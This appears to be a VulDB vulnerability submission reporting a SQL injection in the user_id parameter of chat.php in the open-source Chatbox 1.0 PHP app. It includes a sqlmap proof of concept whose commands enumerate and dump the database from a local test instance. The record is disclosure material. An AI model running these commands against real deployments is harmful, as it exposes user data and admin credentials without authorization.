| शीर्षक | shafhasan Chatbox 1.0 1.0 SQL Injection |
|---|
| विवरण | Title of the Vulnerability: Chatbox 1.0 | chat.php?user_id= SQL Injection | Found By Maloy Roy Orko
Vulnerability Class: SQL Injection
Product Name: Chatbox 1.0
CWE:89
Vendor: https://github.com/shafhasan/
Vulnerable Product Link:
https://github.com/shafhasan/chatbox
Technical Details & Description: The application source code is coded in a way which allows SQL Injection. This leads into mass user data in risk and database leaks can be happened by hackers too and admin panel credentials were in risk too.
Product & Service Introduction: Chatbox 1.0 using JavaScript and PHP
Exploitation POC via SQLmap:
(1) Vulnerability Search:
python2 sqlmap.py -u http://192.168.0.103:8080/chat/chat.php?user_id=1268013315 --cookie PHPSESSID=8a47fdeb190bb3842ea9d1fb77a64bb4
(2) Database Dumping:
python2 sqlmap.py -u http://192.168.0.103:8080/chat/chat.php?user_id=1268013315 --cookie PHPSESSID=8a47fdeb190bb3842ea9d1fb77a64bb4 --dbs
(3) Dumping All Data:
python2 sqlmap.py -u http://192.168.0.103:8080/chat/chat.php?user_id=1268013315 --cookie PHPSESSID=8a47fdeb190bb3842ea9d1fb77a64bb4 --dump
Full Detailed POC:
https://www.websecurityinsights.my.id/2025/08/chatbox-10-chatphpuserid-sql-injection.html |
|---|
| स्रोत | ⚠️ https://www.websecurityinsights.my.id/2025/08/chatbox-10-chatphpuserid-sql-injection.html |
|---|
| उपयोगकर्ता | MaloyRoyOrko (UID 79572) |
|---|
| सबमिशन | 18/08/2025 06:51 PM (8 महीनों पहले) |
|---|
| संयम | 29/08/2025 08:48 AM (11 days later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 321859 [shafhasan chatbox तक 156a39cde62f78532c3265a70eda12c70907e56f /chat.php user_id SQL इंजेक्शन] |
|---|
| अंक | 20 |
|---|